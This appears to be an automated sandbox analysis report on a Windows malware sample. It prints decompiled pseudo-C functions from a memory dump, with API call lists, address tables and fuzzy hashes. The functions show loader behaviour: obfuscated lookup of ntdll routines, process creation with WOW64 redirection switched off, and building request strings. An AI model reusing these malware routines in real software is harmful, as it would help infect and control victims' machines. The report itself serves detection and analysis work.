                                0x0461708a
                                0x0461708e
                                0x0461709a
                                0x0461709f
                                0x046170a8
                                0x046170b9
                                0x046170bd
                                0x046170c6
                                0x046170cc
                                0x046170d9
                                0x046170e6
                                0x046170ec
                                0x046170f4
                                0x046170fa
                                0x04617100
                                0x04617104
                                0x04617108
                                0x0461710e
                                0x04617112
                                0x04617119
                                0x04617120
                                0x04617124
                                0x0461712f
                                0x04617136
                                0x0461713a
                                0x04617143
                                0x04617143
                                0x04617154
                                0x04617154
                                0x04617163
                                0x04617169
                                0x04617169
                                0x04617173
                                0x04617173
                                0x04617184
                                0x04617184
                                0x04617192
                                0x04617192
                                0x046171a2

                                APIs
                                • RtlAllocateHeap.NTDLL(00000000,00000800,?), ref: 04616F1A
                                • GetTickCount.KERNEL32 ref: 04616F2E
                                • wsprintfA.USER32 ref: 04616F7D
                                • wsprintfA.USER32 ref: 04616F9A
                                • wsprintfA.USER32 ref: 04616FBB
                                • wsprintfA.USER32 ref: 04616FD9
                                • wsprintfA.USER32 ref: 04616FEE
                                • wsprintfA.USER32 ref: 0461700F
                                • wsprintfA.USER32 ref: 04617049
                                • wsprintfA.USER32 ref: 04617069
                                • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 04617084
                                • GetTickCount.KERNEL32 ref: 04617094
                                • RtlEnterCriticalSection.NTDLL(053C95F0), ref: 046170A8
                                • RtlLeaveCriticalSection.NTDLL(053C95F0), ref: 046170C6
                                  • Part of subcall function 0461624D: lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,00000000,046170D9,00000000,053C9630), ref: 04616278
                                  • Part of subcall function 0461624D: lstrlen.KERNEL32(00000000,?,00000000,046170D9,00000000,053C9630), ref: 04616280
                                  • Part of subcall function 0461624D: strcpy.NTDLL ref: 04616297
                                  • Part of subcall function 0461624D: lstrcat.KERNEL32(00000000,00000000), ref: 046162A2
                                  • Part of subcall function 0461624D: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,046170D9,?,00000000,046170D9,00000000,053C9630), ref: 046162BF
                                • StrTrimA.SHLWAPI(00000000,046192AC,00000000,053C9630), ref: 046170F4
                                  • Part of subcall function 046121C1: lstrlen.KERNEL32(053C87FA,00000000,00000000,00000000,04617100,00000000), ref: 046121D1
                                  • Part of subcall function 046121C1: lstrlen.KERNEL32(?), ref: 046121D9
                                  • Part of subcall function 046121C1: lstrcpy.KERNEL32(00000000,053C87FA), ref: 046121ED
                                  • Part of subcall function 046121C1: lstrcat.KERNEL32(00000000,?), ref: 046121F8
                                • lstrcpy.KERNEL32(00000000,?), ref: 04617112
                                • lstrcat.KERNEL32(00000000,00000000), ref: 04617120
                                • lstrcat.KERNEL32(00000000,00000000), ref: 04617124
                                • HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 04617154
                                • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 04617163
                                • HeapFree.KERNEL32(00000000,00000000,00000000,053C9630), ref: 04617173
                                • HeapFree.KERNEL32(00000000,?), ref: 04617184
                                • HeapFree.KERNEL32(00000000,00000000), ref: 04617192
                                Memory Dump Source
                                • Source File: 00000003.00000002.490961575.0000000004611000.00000020.00000001.sdmp, Offset: 04610000, based on PE: true
                                • Associated: 00000003.00000002.490944372.0000000004610000.00000004.00000001.sdmp Download File
                                • Associated: 00000003.00000002.490983353.0000000004619000.00000002.00000001.sdmp Download File
                                • Associated: 00000003.00000002.490993986.000000000461A000.00000004.00000001.sdmp Download File
                                • Associated: 00000003.00000002.491013996.000000000461C000.00000002.00000001.sdmp Download File
                                Similarity
                                • API ID: wsprintf$Heap$Free$lstrcatlstrlen$AllocateCountCriticalSectionTickTrimlstrcpy$EnterLeavestrcpy
                                • String ID:
                                • API String ID: 1837416118-0
                                • Opcode ID: cf17879c54dc5b5f48922a1734b5224cbc8adedc8d51972f46d2a349b5216cdd
                                • Instruction ID: 21bfd4f319b34e94da2d2c3ff63652265000fdf200562092d08a2458db5ea642
                                • Opcode Fuzzy Hash: cf17879c54dc5b5f48922a1734b5224cbc8adedc8d51972f46d2a349b5216cdd
                                • Instruction Fuzzy Hash: D1717FB1601205AFD321DBA8EC48E5677E8EB88715B0D551AF949C3231F63EED09DB60
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 04615927, Relevance: 16.6, APIs: 11, Instructions: 112stringCOMMON
                                Download Yara Rule
                                C-Code - Quality: 43%
                                			E04615927(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, WCHAR** _a16, WCHAR** _a20) {
				intOrPtr _v8;
				intOrPtr _v12;
				long _v16;
				WCHAR* _v20;
				signed int _v24;
				void* __esi;
				long _t43;
				intOrPtr _t44;
				intOrPtr _t46;
				void* _t48;
				void* _t49;
				void* _t50;
				WCHAR* _t54;
				intOrPtr _t57;
				void* _t58;
				void* _t59;
				void* _t60;
				intOrPtr _t66;
				void* _t71;
				void* _t74;
				intOrPtr _t75;
				void* _t77;
				intOrPtr _t79;
				intOrPtr* _t80;
				WCHAR* _t91;

				_t79 =  *0x461a38c; // 0x53c9ba0
				_v24 = 8;
				_t43 = GetTickCount();
				_push(5);
				_t74 = 0xa;
				_v16 = _t43;
				_t44 = E04614E1B(_t74,  &_v16);
				_v8 = _t44;
				if(_t44 == 0) {
					_v8 = 0x46191ac;
				}
				_t46 = E046142F0(_t79);
				_v12 = _t46;
				if(_t46 != 0) {
					_t80 = __imp__;
					_t48 =  *_t80(_v8, _t71);
					_t49 =  *_t80(_v12);
					_t50 =  *_t80(_a4);
					_t54 = E04616837(lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + 0x102);
					_v20 = _t54;
					if(_t54 != 0) {
						_t75 =  *0x461a2d4; // 0xdad5a8
						_t16 = _t75 + 0x461baa8; // 0x530025
						wsprintfW(_t54, _t16, _v8, _v8, _a4, _v12, _a8);
						_push(4);
						_t77 = 5;
						_t57 = E04614E1B(_t77,  &_v16);
						_v8 = _t57;
						if(_t57 == 0) {
							_v8 = 0x46191b0;
						}
						_t58 =  *_t80(_v8);
						_t59 =  *_t80(_v12);
						_t60 =  *_t80(_a4);
						_t91 = E04616837(lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + 0x13a);
						if(_t91 == 0) {
							E046150CA(_v20);
						} else {
							_t66 =  *0x461a2d4; // 0xdad5a8
							_t31 = _t66 + 0x461bbc8; // 0x73006d
							wsprintfW(_t91, _t31, _v8, _v8, _a4, _v12, _a12);
							 *_a16 = _v20;
							_v24 = _v24 & 0x00000000;
							 *_a20 = _t91;
						}
					}
					E046150CA(_v12);
				}
				return _v24;
			}




























                                0x0461592f
                                0x04615935
                                0x0461593c
                                0x04615942
                                0x04615946
                                0x0461594a
                                0x0461594d
                                0x04615954
                                0x04615957
                                0x04615959
                                0x04615959
                                0x04615962
                                0x04615969
                                0x0461596c
                                0x04615972
                                0x0461597c
                                0x04615985
                                0x0461598c
                                0x046159a5
                                0x046159ac
                                0x046159af
                                0x046159b8
                                0x046159c1
                                0x046159d2
                                0x046159db
                                0x046159df
                                0x046159e3
                                0x046159ea
                                0x046159ed
                                0x046159ef
                                0x046159ef
                                0x046159f9
                                0x04615a02
                                0x04615a09
                                0x04615a21
                                0x04615a25
                                0x04615a62
                                0x04615a27
                                0x04615a2a
                                0x04615a32
                                0x04615a43
                                0x04615a4f
                                0x04615a57
                                0x04615a5b
                                0x04615a5b
                                0x04615a25
                                0x04615a6a
                                0x04615a6f
                                0x04615a76

                                APIs
                                • GetTickCount.KERNEL32 ref: 0461593C
                                • lstrlen.KERNEL32(?,80000002,00000005), ref: 0461597C
                                • lstrlen.KERNEL32(00000000), ref: 04615985
                                • lstrlen.KERNEL32(00000000), ref: 0461598C
                                • lstrlenW.KERNEL32(80000002), ref: 04615999
                                • wsprintfW.USER32 ref: 046159D2
                                • lstrlen.KERNEL32(?,00000004), ref: 046159F9
                                • lstrlen.KERNEL32(?), ref: 04615A02
                                • lstrlen.KERNEL32(?), ref: 04615A09
                                • lstrlenW.KERNEL32(?), ref: 04615A10
                                • wsprintfW.USER32 ref: 04615A43
                                  • Part of subcall function 046150CA: RtlFreeHeap.NTDLL(00000000,00000000,04614239,00000000,00000001,?,00000000,?,?,?,04616B8D,00000000,?,00000001), ref: 046150D6
                                Memory Dump Source
                                • Source File: 00000003.00000002.490961575.0000000004611000.00000020.00000001.sdmp, Offset: 04610000, based on PE: true
                                • Associated: 00000003.00000002.490944372.0000000004610000.00000004.00000001.sdmp Download File
                                • Associated: 00000003.00000002.490983353.0000000004619000.00000002.00000001.sdmp Download File
                                • Associated: 00000003.00000002.490993986.000000000461A000.00000004.00000001.sdmp Download File
                                • Associated: 00000003.00000002.491013996.000000000461C000.00000002.00000001.sdmp Download File
                                Similarity
                                • API ID: lstrlen$wsprintf$CountFreeHeapTick
                                • String ID:
                                • API String ID: 822878831-0
                                • Opcode ID: a5d770d75b92e6dcbec6909c7e79ae64f6731afe536af8376581cd3eb4a4996a
                                • Instruction ID: 9351cfb6db3479f097188dd3c7865d2dafc2b21b2df0ed284d8f68edd4d6b024
                                • Opcode Fuzzy Hash: a5d770d75b92e6dcbec6909c7e79ae64f6731afe536af8376581cd3eb4a4996a
                                • Instruction Fuzzy Hash: CA416972D00218FFCF11AFA4CD48A9EBBB5EF48318F090055ED05A7231E735AA54EBA4
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 046151A8, Relevance: 13.6, APIs: 9, Instructions: 110librarymemoryloaderCOMMON
                                Download Yara Rule
                                C-Code - Quality: 61%
                                			E046151A8(void* __eax, void* __ecx) {
				long _v8;
				void* _v12;
				void* _v16;
				void* _v28;
				long _v32;
				void _v104;
				char _v108;
				long _t39;
				intOrPtr _t43;
				intOrPtr _t50;
				void* _t52;
				intOrPtr _t53;
				void* _t61;
				intOrPtr* _t66;
				intOrPtr* _t73;
				intOrPtr* _t76;

				_t1 = __eax + 0x14; // 0x74183966
				_t71 =  *_t1;
				_t39 = E04614F5A(__ecx,  *((intOrPtr*)( *_t1 + 0xc)),  &_v12,  &_v16);
				_v8 = _t39;
				if(_t39 != 0) {
					L12:
					return _v8;
				}
				E046177A4( *((intOrPtr*)(_t71 + 0xc)),  *((intOrPtr*)(_t71 + 8)), _v12);
				_t43 = _v12(_v12);
				_v8 = _t43;
				if(_t43 == 0 && ( *0x461a2b8 & 0x00000001) != 0) {
					_v32 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v108 = 0;
					memset( &_v104, 0, 0x40);
					_t50 =  *0x461a2d4; // 0xdad5a8
					_t18 = _t50 + 0x461b4a3; // 0x73797325
					_t52 = E04616343(_t18);
					_v12 = _t52;
					if(_t52 == 0) {
						_v8 = 8;
					} else {
						_t53 =  *0x461a2d4; // 0xdad5a8
						_t20 = _t53 + 0x461b770; // 0x53c8d18
						_t21 = _t53 + 0x461b0af; // 0x4e52454b
						_t66 = GetProcAddress(GetModuleHandleA(_t21), _t20);
						if(_t66 == 0) {
							_v8 = 0x7f;
						} else {
							_t73 = __imp__;
							_v108 = 0x44;
							 *_t73(0);
							_t61 =  *_t66(0, _v12, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32);
							 *_t73(1);
							if(_t61 == 0) {
								_v8 = GetLastError();
							} else {
								CloseHandle(_v28);
								CloseHandle(_v32);
							}
						}
						HeapFree( *0x461a290, 0, _v12);
					}
				}
				_t76 = _v16;
				 *((intOrPtr*)(_t76 + 0x18))( *((intOrPtr*)(_t76 + 0x1c))( *_t76));
				E046150CA(_t76);
				goto L12;
			}



















                                0x046151b1
                                0x046151b1
                                0x046151bf
                                0x046151c8
                                0x046151cb
                                0x046152dd
                                0x046152e4
                                0x046152e4
                                0x046151da
                                0x046151e2
                                0x046151e7
                                0x046151ea
                                0x046151ff
                                0x04615205
                                0x04615206
                                0x04615209
                                0x0461520f
                                0x04615212
                                0x04615217
                                0x0461521f
                                0x04615226
                                0x0461522d
                                0x04615230
                                0x046152c4
                                0x04615236
                                0x04615236
                                0x0461523b
                                0x04615242
                                0x04615256
                                0x0461525a
                                0x046152ab
                                0x0461525c
                                0x0461525c
                                0x04615263
                                0x0461526a
                                0x04615282
                                0x04615288
                                0x0461528c
                                0x046152a6
                                0x0461528e
                                0x04615297
                                0x0461529c
                                0x0461529c
                                0x0461528c
                                0x046152bc
                                0x046152bc
                                0x04615230
                                0x046152cb
                                0x046152d4
                                0x046152d8
                                0x00000000

                                APIs
                                  • Part of subcall function 04614F5A: GetModuleHandleA.KERNEL32(4C44544E,00000020,74183966,00000000,00000000,?,?,?,046151C4,?,?,?,?,00000000,00000000), ref: 04614F7F
                                  • Part of subcall function 04614F5A: GetProcAddress.KERNEL32(00000000,7243775A), ref: 04614FA1
                                  • Part of subcall function 04614F5A: GetProcAddress.KERNEL32(00000000,614D775A), ref: 04614FB7
                                  • Part of subcall function 04614F5A: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 04614FCD
                                  • Part of subcall function 04614F5A: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 04614FE3
                                  • Part of subcall function 04614F5A: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 04614FF9
                                • memset.NTDLL ref: 04615212
                                  • Part of subcall function 04616343: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,0461522B,73797325), ref: 04616354
                                  • Part of subcall function 04616343: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 0461636E
                                • GetModuleHandleA.KERNEL32(4E52454B,053C8D18,73797325), ref: 04615249
                                • GetProcAddress.KERNEL32(00000000), ref: 04615250
                                • Wow64EnableWow64FsRedirection.KERNEL32(00000000), ref: 0461526A
                                • Wow64EnableWow64FsRedirection.KERNEL32(00000001), ref: 04615288
                                • CloseHandle.KERNEL32(00000000), ref: 04615297
                                • CloseHandle.KERNEL32(?), ref: 0461529C
                                • GetLastError.KERNEL32 ref: 046152A0
                                • HeapFree.KERNEL32(00000000,?), ref: 046152BC
                                Memory Dump Source
                                • Source File: 00000003.00000002.490961575.0000000004611000.00000020.00000001.sdmp, Offset: 04610000, based on PE: true
                                • Associated: 00000003.00000002.490944372.0000000004610000.00000004.00000001.sdmp Download File
                                • Associated: 00000003.00000002.490983353.0000000004619000.00000002.00000001.sdmp Download File
                                • Associated: 00000003.00000002.490993986.000000000461A000.00000004.00000001.sdmp Download File
                                • Associated: 00000003.00000002.491013996.000000000461C000.00000002.00000001.sdmp Download File
                                Similarity
                                • API ID: AddressProc$HandleWow64$CloseEnableEnvironmentExpandModuleRedirectionStrings$ErrorFreeHeapLastmemset
                                • String ID:
                                • API String ID: 91923200-0
                                • Opcode ID: beebba47437aec86db0f5d23962df189c7deb921b1c80f0872c6333e8648cb50
                                • Instruction ID: 4c0a1b928df1955034b0e81233f3930909866cdc9119731a0b04f9b491234252
                                • Opcode Fuzzy Hash: beebba47437aec86db0f5d23962df189c7deb921b1c80f0872c6333e8648cb50
                                • Instruction Fuzzy Hash: 2E316B72901219FFDB11AFE4C8489DEBFB8FF48300F184056E506A3230E775AA45DBA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 04614F5A, Relevance: 9.1, APIs: 6, Instructions: 81libraryloaderCOMMON
                                Download Yara Rule
                                C-Code - Quality: 100%
                                			E04614F5A(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				intOrPtr _v8;
				intOrPtr _t23;
				intOrPtr _t26;
				_Unknown_base(*)()* _t28;
				intOrPtr _t30;
				_Unknown_base(*)()* _t32;
				intOrPtr _t33;
				_Unknown_base(*)()* _t35;
				intOrPtr _t36;
				_Unknown_base(*)()* _t38;
				intOrPtr _t39;
				_Unknown_base(*)()* _t41;
				intOrPtr _t44;
				struct HINSTANCE__* _t48;
				intOrPtr _t54;

				_t54 = E04616837(0x20);
				if(_t54 == 0) {
					_v8 = 8;
				} else {
					_t23 =  *0x461a2d4; // 0xdad5a8
					_t1 = _t23 + 0x461b11a; // 0x4c44544e
					_t48 = GetModuleHandleA(_t1);
					_t26 =  *0x461a2d4; // 0xdad5a8
					_t2 = _t26 + 0x461b792; // 0x7243775a
					_v8 = 0x7f;
					_t28 = GetProcAddress(_t48, _t2);
					 *(_t54 + 0xc) = _t28;
					if(_t28 == 0) {
						L8:
						E046150CA(_t54);
					} else {
						_t30 =  *0x461a2d4; // 0xdad5a8
						_t5 = _t30 + 0x461b77f; // 0x614d775a
						_t32 = GetProcAddress(_t48, _t5);
						 *(_t54 + 0x10) = _t32;
						if(_t32 == 0) {
							goto L8;
						} else {
							_t33 =  *0x461a2d4; // 0xdad5a8
							_t7 = _t33 + 0x461b74e; // 0x6e55775a
							_t35 = GetProcAddress(_t48, _t7);
							 *(_t54 + 0x14) = _t35;
							if(_t35 == 0) {
								goto L8;
							} else {
								_t36 =  *0x461a2d4; // 0xdad5a8
								_t9 = _t36 + 0x461b72e; // 0x4e6c7452
								_t38 = GetProcAddress(_t48, _t9);
								 *(_t54 + 0x18) = _t38;
								if(_t38 == 0) {
									goto L8;
								} else {
									_t39 =  *0x461a2d4; // 0xdad5a8
									_t11 = _t39 + 0x461b7a2; // 0x6c43775a
									_t41 = GetProcAddress(_t48, _t11);
									 *(_t54 + 0x1c) = _t41;
									if(_t41 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t54 + 4)) = _a4;
										 *((intOrPtr*)(_t54 + 8)) = 0x40;
										_t44 = E04614248(_t54, _a8);
										_v8 = _t44;
										if(_t44 != 0) {
											goto L8;
										} else {
											 *_a12 = _t54;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}


















                                0x04614f69
                                0x04614f6d
                                0x0461502f
                                0x04614f73
                                0x04614f73
                                0x04614f78
                                0x04614f8b
                                0x04614f8d
                                0x04614f92
                                0x04614f9a
                                0x04614fa1
                                0x04614fa5
                                0x04614fa8
                                0x04615027
                                0x04615028
                                0x04614faa
                                0x04614faa
                                0x04614faf
                                0x04614fb7
                                0x04614fbb
                                0x04614fbe
                                0x00000000
                                0x04614fc0
                                0x04614fc0
                                0x04614fc5
                                0x04614fcd
                                0x04614fd1
                                0x04614fd4
                                0x00000000
                                0x04614fd6
                                0x04614fd6
                                0x04614fdb
                                0x04614fe3
                                0x04614fe7
                                0x04614fea
                                0x00000000
                                0x04614fec
                                0x04614fec
                                0x04614ff1
                                0x04614ff9
                                0x04614ffd
                                0x04615000
                                0x00000000
                                0x04615002
                                0x04615008
                                0x0461500d
                                0x04615014
                                0x0461501b
                                0x0461501e
                                0x00000000
                                0x04615020
                                0x04615023
                                0x04615023
                                0x0461501e
                                0x04615000
                                0x04614fea
                                0x04614fd4
                                0x04614fbe
                                0x04614fa8
                                0x0461503d

                                APIs
                                  • Part of subcall function 04616837: RtlAllocateHeap.NTDLL(00000000,00000000,04614197), ref: 04616843
                                • GetModuleHandleA.KERNEL32(4C44544E,00000020,74183966,00000000,00000000,?,?,?,046151C4,?,?,?,?,00000000,00000000), ref: 04614F7F
                                • GetProcAddress.KERNEL32(00000000,7243775A), ref: 04614FA1
                                • GetProcAddress.KERNEL32(00000000,614D775A), ref: 04614FB7
                                • GetProcAddress.KERNEL32(00000000,6E55775A), ref: 04614FCD
                                • GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 04614FE3
                                • GetProcAddress.KERNEL32(00000000,6C43775A), ref: 04614FF9
                                  • Part of subcall function 04614248: memset.NTDLL ref: 046142C7
                                Memory Dump Source
                                • Source File: 00000003.00000002.490961575.0000000004611000.00000020.00000001.sdmp, Offset: 04610000, based on PE: true
                                • Associated: 00000003.00000002.490944372.0000000004610000.00000004.00000001.sdmp Download File
                                • Associated: 00000003.00000002.490983353.0000000004619000.00000002.00000001.sdmp Download File
                                • Associated: 00000003.00000002.490993986.000000000461A000.00000004.00000001.sdmp Download File
                                • Associated: 00000003.00000002.491013996.000000000461C000.00000002.00000001.sdmp Download File
                                Similarity
                                • API ID: AddressProc$AllocateHandleHeapModulememset
                                • String ID:
                                • API String ID: 1886625739-0
                                • Opcode ID: 5237cfe0669c0e99f0886ffe65fad03fdc323eedfe900832c3099c5226cf6893
                                • Instruction ID: 7bcb4bd5f13ec70d2e2df009f61d9abd070f0e497a6db61495285d49b6f07fe4
                                • Opcode Fuzzy Hash: 5237cfe0669c0e99f0886ffe65fad03fdc323eedfe900832c3099c5226cf6893
                                • Instruction Fuzzy Hash: C1213CB1600246AFD750DFB9D844E5AB7ECEB58745B0D541AE409C7222F739F905CF60
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 04612A23, Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 145stringCOMMON
                                Download Yara Rule
                                C-Code - Quality: 22%
                                			E04612A23(signed int __eax, signed int _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				signed int _v20;
				intOrPtr _t81;
				char _t83;
				signed int _t90;
				signed int _t97;
				signed int _t99;
				char _t101;
				unsigned int _t102;
				intOrPtr _t103;
				char* _t107;
				signed int _t110;
				signed int _t113;
				signed int _t118;
				signed int _t122;
				intOrPtr _t124;

				_t102 = _a8;
				_t118 = 0;
				_v20 = __eax;
				_t122 = (_t102 >> 2) + 1;
				_v8 = 0;
				_a8 = 0;
				_t81 = E04616837(_t122 << 2);
				_v16 = _t81;
				if(_t81 == 0) {
					_push(8);
					_pop(0);
					L37:
					return 0;
				}
				_t107 = _a4;
				_a4 = _t102;
				_t113 = 0;
				while(1) {
					_t83 =  *_t107;
					if(_t83 == 0) {
						break;
					}
					if(_t83 == 0xd || _t83 == 0xa) {
						if(_t118 != 0) {
							if(_t118 > _v8) {
								_v8 = _t118;
							}
							_a8 = _a8 + 1;
							_t118 = 0;
						}
						 *_t107 = 0;
						goto L16;
					} else {
						if(_t118 != 0) {
							L10:
							_t118 = _t118 + 1;
							L16:
							_t107 = _t107 + 1;
							_t15 =  &_a4;
							 *_t15 = _a4 - 1;
							if( *_t15 != 0) {
								continue;
							}
							break;
						}
						if(_t113 == _t122) {
							L21:
							if(_a8 <= 0x20) {
								_push(0xb);
								L34:
								_pop(0);
								L35:
								E046150CA(_v16);
								goto L37;
							}
							_t103 = E04616837((_v8 + _v8 + 5) * _a8 + 4);
							if(_t103 == 0) {
								_push(8);
								goto L34;
							}
							_t90 = _a8;
							_a4 = _a4 & 0x00000000;
							_v8 = _v8 & 0x00000000;
							_t124 = _t103 + _t90 * 4;
							if(_t90 <= 0) {
								L31:
								 *0x461a2cc = _t103;
								goto L35;
							}
							do {
								_t110 = 0x3c6ef35f + _v20 * 0x19660d;
								_v20 = 0x3c6ef35f + _t110 * 0x19660d;
								__imp__(_t124,  *((intOrPtr*)(_v16 + _t110 % _a8 * 4)));
								__imp__(_t124,  *((intOrPtr*)(_v16 + _v20 % _a8 * 4)));
								_v12 = _v12 & 0x00000000;
								if(_a4 <= 0) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t99 = _v12;
									__imp__( *((intOrPtr*)(_t103 + _t99 * 4)), _t124);
									if(_t99 == 0) {
										break;
									}
									_v12 = _v12 + 1;
									if(_v12 < _a4) {
										continue;
									}
									goto L30;
								}
								_v8 = _v8 - 1;
								L30:
								_t97 = _a4;
								_a4 = _a4 + 1;
								 *((intOrPtr*)(_t103 + _t97 * 4)) = _t124;
								__imp__(_t124);
								_v8 = _v8 + 1;
								_t124 = _t124 + _t97 + 1;
							} while (_v8 < _a8);
							goto L31;
						}
						 *((intOrPtr*)(_v16 + _t113 * 4)) = _t107;
						_t101 = _t83;
						if(_t83 - 0x61 <= 0x19) {
							_t101 = _t101 - 0x20;
						}
						 *_t107 = _t101;
						_t113 = _t113 + 1;
						goto L10;
					}
				}
				if(_t118 != 0) {
					if(_t118 > _v8) {
						_v8 = _t118;
					}
					_a8 = _a8 + 1;
				}
				goto L21;
			}





















                                0x04612a2a
                                0x04612a31
                                0x04612a36
                                0x04612a39
                                0x04612a40
                                0x04612a43
                                0x04612a46
                                0x04612a4d
                                0x04612a50
                                0x04612ba4
                                0x04612ba6
                                0x04612ba8
                                0x04612bad
                                0x04612bad
                                0x04612a56
                                0x04612a59
                                0x04612a5c
                                0x04612a5e
                                0x04612a5e
                                0x04612a62
                                0x00000000
                                0x00000000
                                0x04612a66
                                0x04612a92
                                0x04612a97
                                0x04612a99
                                0x04612a99
                                0x04612a9c
                                0x04612a9f
                                0x04612a9f
                                0x04612aa1
                                0x00000000
                                0x04612a6c
                                0x04612a6e
                                0x04612a8d
                                0x04612a8d
                                0x04612aa4
                                0x04612aa4
                                0x04612aa5
                                0x04612aa5
                                0x04612aa8
                                0x00000000
                                0x00000000
                                0x00000000
                                0x04612aa8
                                0x04612a72
                                0x04612ab9
                                0x04612abd
                                0x04612b97
                                0x04612b99
                                0x04612b99
                                0x04612b9a
                                0x04612b9d
                                0x00000000
                                0x04612b9d
                                0x04612ad7
                                0x04612adb
                                0x04612b93
                                0x00000000
                                0x04612b93
                                0x04612ae1
                                0x04612ae4
                                0x04612ae8
                                0x04612aee
                                0x04612af1
                                0x04612b89
                                0x04612b89
                                0x00000000
                                0x04612b8f
                                0x04612afc
                                0x04612b05
                                0x04612b19
                                0x04612b20
                                0x04612b35
                                0x04612b3b
                                0x04612b43
                                0x00000000
                                0x00000000
                                0x00000000
                                0x00000000
                                0x04612b45
                                0x04612b45
                                0x04612b45
                                0x04612b4c
                                0x04612b54
                                0x00000000
                                0x00000000
                                0x04612b56
                                0x04612b5f
                                0x00000000
                                0x00000000
                                0x00000000
                                0x04612b61
                                0x04612b63
                                0x04612b66
                                0x04612b66
                                0x04612b69
                                0x04612b6d
                                0x04612b70
                                0x04612b76
                                0x04612b79
                                0x04612b80
                                0x00000000
                                0x04612afc
                                0x04612a77
                                0x04612a82
                                0x04612a85
                                0x04612a87
                                0x04612a87
                                0x04612a8a
                                0x04612a8c
                                0x00000000
                                0x04612a8c
                                0x04612a66
                                0x04612aac
                                0x04612ab1
                                0x04612ab3
                                0x04612ab3
                                0x04612ab6
                                0x04612ab6
                                0x00000000

                                APIs
                                  • Part of subcall function 04616837: RtlAllocateHeap.NTDLL(00000000,00000000,04614197), ref: 04616843
                                • lstrcpy.KERNEL32(63699BC4,00000020), ref: 04612B20
                                • lstrcat.KERNEL32(63699BC4,00000020), ref: 04612B35
                                • lstrcmp.KERNEL32(00000000,63699BC4), ref: 04612B4C
                                • lstrlen.KERNEL32(63699BC4), ref: 04612B70
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.490961575.0000000004611000.00000020.00000001.sdmp, Offset: 04610000, based on PE: true
                                • Associated: 00000003.00000002.490944372.0000000004610000.00000004.00000001.sdmp Download File
                                • Associated: 00000003.00000002.490983353.0000000004619000.00000002.00000001.sdmp Download File
                                • Associated: 00000003.00000002.490993986.000000000461A000.00000004.00000001.sdmp Download File
                                • Associated: 00000003.00000002.491013996.000000000461C000.00000002.00000001.sdmp Download File
                                Similarity
                                • API ID: AllocateHeaplstrcatlstrcmplstrcpylstrlen
                                • String ID:
                                • API String ID: 3214092121-3916222277
                                • Opcode ID: 83cc96e9acb4d31a94b57754436f0c0c849e8caf24032c7e10cbc8b6b970d660
                                • Instruction ID: 12b85ed56d63d97e732d5c20a592e4f53bee4bb2ccbb669abd3de81424b2a8c3
                                • Opcode Fuzzy Hash: 83cc96e9acb4d31a94b57754436f0c0c849e8caf24032c7e10cbc8b6b970d660
                                • Instruction Fuzzy Hash: 8C51D571A00108EFDF21CF99C494AADBBB5FF55314F09809BE815AB321E770BA51CB80
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 04614C1B, Relevance: 7.5, APIs: 5, Instructions: 31COMMON
                                Download Yara Rule
                                C-Code - Quality: 100%
                                			E04614C1B(intOrPtr _a4) {
				void* _t2;
				long _t4;
				void* _t5;
				long _t6;
				void* _t7;

				_t2 = CreateEventA(0, 1, 0, 0);
				 *0x461a2c4 = _t2;
				if(_t2 == 0) {
					return GetLastError();
				}
				_t4 = GetVersion();
				if(_t4 <= 5) {
					_t5 = 0x32;
					return _t5;
				}
				 *0x461a2b4 = _t4;
				_t6 = GetCurrentProcessId();
				 *0x461a2b0 = _t6;
				 *0x461a2bc = _a4;
				_t7 = OpenProcess(0x10047a, 0, _t6);
				 *0x461a2ac = _t7;
				if(_t7 == 0) {
					 *0x461a2ac =  *0x461a2ac | 0xffffffff;
				}
				return 0;
			}








                                0x04614c23
                                0x04614c2b
                                0x04614c30
                                0x00000000
                                0x04614c7d
                                0x04614c32
                                0x04614c3a
                                0x04614c7a
                                0x00000000
                                0x04614c7a
                                0x04614c3c
                                0x04614c41
                                0x04614c53
                                0x04614c58
                                0x04614c5e
                                0x04614c66
                                0x04614c6b
                                0x04614c6d
                                0x04614c6d
                                0x00000000

                                APIs
                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,04616B4E,?,?,00000001), ref: 04614C23
                                • GetVersion.KERNEL32(?,00000001), ref: 04614C32
                                • GetCurrentProcessId.KERNEL32(?,00000001), ref: 04614C41
                                • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,00000001), ref: 04614C5E
                                • GetLastError.KERNEL32(?,00000001), ref: 04614C7D
                                Memory Dump Source
                                • Source File: 00000003.00000002.490961575.0000000004611000.00000020.00000001.sdmp, Offset: 04610000, based on PE: true
                                • Associated: 00000003.00000002.490944372.0000000004610000.00000004.00000001.sdmp Download File
                                • Associated: 00000003.00000002.490983353.0000000004619000.00000002.00000001.sdmp Download File
                                • Associated: 00000003.00000002.490993986.000000000461A000.00000004.00000001.sdmp Download File
                                • Associated: 00000003.00000002.491013996.000000000461C000.00000002.00000001.sdmp Download File
                                Similarity
